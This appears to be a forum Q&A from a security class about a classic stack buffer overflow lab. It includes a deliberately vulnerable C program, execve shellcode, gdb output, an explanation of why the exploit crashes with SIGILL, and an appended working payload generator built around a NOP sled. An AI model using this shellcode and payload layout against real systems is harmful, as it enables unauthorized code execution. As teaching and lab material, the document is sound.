Getting SIGILL trying to execute a buffer overflow attack

2011-09-30 96 views
5

I'm working on the buffer overflow project for my security class and I thought I had everything set up correctly, but when I run it I get:

Program received signal SIGILL, Illegal Instruction. 
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22 
22  fread(str,sizeof(char),517,badfile); 

Here's stack.c

#include <stdio.h> 
#include <string.h> 

int bof(char *str) 
{ 
    char buffer[12]; 
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);   /* no length check: str holds up to 517 bytes */ 
    return 1; 
} 

int main(int argc, char **argv) 
{ 
    char str[517]; 
    FILE *badfile; 
    badfile = fopen("badfile", "r"); 
    fread(str, sizeof(char), 517, badfile);   /* attacker-controlled contents */ 
    bof(str); 
    printf("Returned Properly\n"); 
    return 1; 
} 

Here is exploit.c

#include <stdio.h> 
#include <string.h> 

/* 24-byte execve("//bin/sh") shellcode, no NUL bytes */ 
char code[]= 
"\x31\xc0"      // xorl   %eax,%eax 
"\x50"       // pushl  %eax 
"\x68\x6e\x2f\x73\x68"   // pushl  $0x68732f6e 
"\x68\x2f\x2f\x62\x69"   // pushl  $0x69622f2f 
"\x89\xe3"      // movl   %esp,%ebx 
"\x99"       // cltd 
"\x52"       // pushl  %edx 
"\x53"       // pushl  %ebx 
"\x89\xe1"      // movl   %esp,%ecx 
"\xb0\x0b"      // movb   $0xb,%al 
"\xcd\x80"      // int   $0x80 
; 

char retaddr[] = "\x70\xF2\xFF\xBF";   /* 0xbffff270, little-endian */ 

int main(int argc, char **argv) 
{ 
    char strr[517];   /* unused */ 
    strr[0] = 'Z'; 
    strr[1] = 0; 
    strr[2] = '\x00'; 
    char buffer[517]; 
    FILE *badfile; 

    /* Initialize buffer with 0x90 (NOP instruction) */ 
    memset(buffer, 0x90, 517); 

    /* You need to fill the buffer with appropriate contents here */ 
    //memcpy(buffer, "EGG=", 4); 

    memcpy(buffer, code, 24);              /* all 24 shellcode bytes at offset 0 */ 
    memcpy(buffer+20,retaddr,4);           /* overwrites shellcode bytes 20-23 */ 
    memcpy(buffer+24,"\x00\x00\x00\x00",4); 

    /* Save the contents to the file "badfile" */ 
    badfile = fopen("./badfile", "w"); 
    fwrite(buffer,517,1,badfile); 
    fclose(badfile);  
    return 0; 
} 

Here is the stack at run time.

Starting program: /home/john/stack

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277") 
at stack.c:13 
13  strcpy(buffer, str); 
(gdb) x/12xw $esp 
0xbffff270: 0x00000205 0xbffff298 0x004a13be 0x0804b008 
0xbffff280: 0xbffff2b7 0x00000205 0xb7fef6c0 0x00584ff4 
0xbffff290: 0x00000000 0x00000000 0xbffff4c8 0x0804850f 
(gdb) s 
14  return 1; 
(gdb) x/12xw $esp 
0xbffff270: 0xbffff284 0xbffff2b7 0x004a13be 0x0804b008 
0xbffff280: 0xbffff2b7 0x6850c031 0x68732f6e 0x622f2f68 
0xbffff290: 0x99e38969 0xe1895352 0xbffff270 0x08048500 
(gdb) c 
Continuing. 

Any idea why I'm getting SIGILL?

Answer

4

Because you're executing illegal code. In your exploit.c you overwrite offsets 20-23 with the return address; those bytes were previously b0 0b cd 80, which correspond to the last two instructions, mov $0xb,%al and int $0x80. The zero bytes you put in are illegal code.

Since the return address has to be at that particular offset for this target, you need to modify the shellcode so it avoids that data. I'd suggest either moving the shellcode to after that offset and pointing the return address at it, or jumping over the return address so the processor doesn't try to execute it.

+0

I get an address out of bounds when I put the address after the ret. – jwineman
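A payload generator that lays the file out the way the answer suggests, as an added example that is neither the original exploit.c nor code from the answerer: the shellcode goes at the very end of the 517-byte file (so its NUL terminator ends the strcpy), the return address sits in its own slot, everything in between is a NOP sled, and the return address points into that sled so nothing ever executes the address bytes themselves. The offset 24 and the addresses are assumptions read off the gdb dump in the question (buffer[] at 0xbffff284, the saved return address 0x08048500 at 0xbffff29c) and must be re-checked in gdb for your own build; build_payload, ret_lands_in_sled and strcpy_len are names introduced here.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define PAYLOAD_LEN 517   /* size of badfile, matching str[517] in stack.c */

/* The 24-byte execve("//bin/sh") shellcode from the question. It contains
 * no NUL byte, so the strcpy() in bof() copies it whole. */
static const unsigned char shellcode[] =
    "\x31\xc0"              /* xorl  %eax,%eax                    */
    "\x50"                  /* pushl %eax      string terminator  */
    "\x68\x6e\x2f\x73\x68"  /* pushl $0x68732f6e   "n/sh"         */
    "\x68\x2f\x2f\x62\x69"  /* pushl $0x69622f2f   "//bi"         */
    "\x89\xe3"              /* movl  %esp,%ebx     path           */
    "\x99"                  /* cltd                edx = 0        */
    "\x52"                  /* pushl %edx          envp = NULL    */
    "\x53"                  /* pushl %ebx          argv[0]        */
    "\x89\xe1"              /* movl  %esp,%ecx     argv           */
    "\xb0\x0b"              /* movb  $0xb,%al      SYS_execve     */
    "\xcd\x80";             /* int   $0x80                        */
/* sizeof(shellcode) is 25: the 24 instruction bytes plus the literal's NUL */

typedef struct {
    unsigned char bytes[PAYLOAD_LEN];
    size_t ret_off;   /* offset of the 4-byte return address in bytes[] */
    size_t code_off;  /* offset of the shellcode in bytes[]             */
} payload_t;

/* Lay out the file: NOP sled everywhere, the return address at ret_off,
 * the shellcode at the end so its NUL terminator is the last byte.
 * Returns 0 on success, -1 when the return address would overlap the
 * shellcode (the bug in the question's exploit.c) or contains a NUL
 * byte, which would cut the strcpy() short. */
int build_payload(payload_t *p, size_t ret_off, uint32_t ret_addr)
{
    size_t code_off = PAYLOAD_LEN - sizeof(shellcode);
    if (ret_off + 4 > code_off)
        return -1;
    for (int i = 0; i < 4; i++)
        if (((ret_addr >> (8 * i)) & 0xffu) == 0)
            return -1;

    memset(p->bytes, 0x90, PAYLOAD_LEN);
    for (int i = 0; i < 4; i++)                       /* little-endian */
        p->bytes[ret_off + i] = (unsigned char)(ret_addr >> (8 * i));
    memcpy(p->bytes + code_off, shellcode, sizeof(shellcode));
    p->ret_off = ret_off;
    p->code_off = code_off;
    return 0;
}

/* Given the address buffer[] ends up at, report whether ret_addr lands in
 * the NOP sled, i.e. after the return-address slot and before the shellcode,
 * so execution slides into the shellcode instead of hitting the address bytes. */
int ret_lands_in_sled(const payload_t *p, uint32_t buf_addr, uint32_t ret_addr)
{
    uint32_t lo = buf_addr + (uint32_t)(p->ret_off + 4);
    uint32_t hi = buf_addr + (uint32_t)p->code_off;   /* exclusive */
    return ret_addr >= lo && ret_addr < hi;
}

/* Number of bytes strcpy(buffer, str) will copy, terminator included. */
size_t strcpy_len(const payload_t *p)
{
    return strlen((const char *)p->bytes) + 1;
}

int main(void)
{
    payload_t p;
    /* Assumed values, read off the gdb dump in the question: buffer[] is at
     * 0xbffff284 and the saved return address 0x08048500 sits at 0xbffff29c,
     * so ret_off = 0x29c - 0x284 = 24. Re-check both with x/12xw $esp. */
    const uint32_t buf_addr = 0xbffff284u;
    const size_t   ret_off  = 24;
    const uint32_t ret_addr = 0xbffff3a0u;   /* assumed: a spot inside the sled */

    if (build_payload(&p, ret_off, ret_addr) != 0) {
        fprintf(stderr, "bad layout: address overlaps shellcode or has a NUL\n");
        return 1;
    }
    if (!ret_lands_in_sled(&p, buf_addr, ret_addr)) {
        fprintf(stderr, "0x%08x does not point into the NOP sled\n", (unsigned)ret_addr);
        return 1;
    }
    FILE *badfile = fopen("./badfile", "wb");
    if (badfile == NULL) {
        perror("fopen");
        return 1;
    }
    fwrite(p.bytes, 1, PAYLOAD_LEN, badfile);
    fclose(badfile);
    printf("ret at +%zu -> 0x%08x, sled [+%zu,+%zu), shellcode at +%zu, strcpy copies %zu bytes\n",
           p.ret_off, (unsigned)ret_addr, p.ret_off + 4, p.code_off, p.code_off,
           strcpy_len(&p));
    return 0;
}
```

The two rejects in build_payload are the checks worth keeping: the overlap test catches the "shellcode at 0, address at +20" layout from the question, and the NUL test matters because strcpy stops at the first zero byte, so an address such as 0xbffff300 would truncate the copy before the shellcode is ever written. The stack addresses shift with the environment and with how the binary is started, so read them from gdb on the exact binary you attack rather than reusing the ones above.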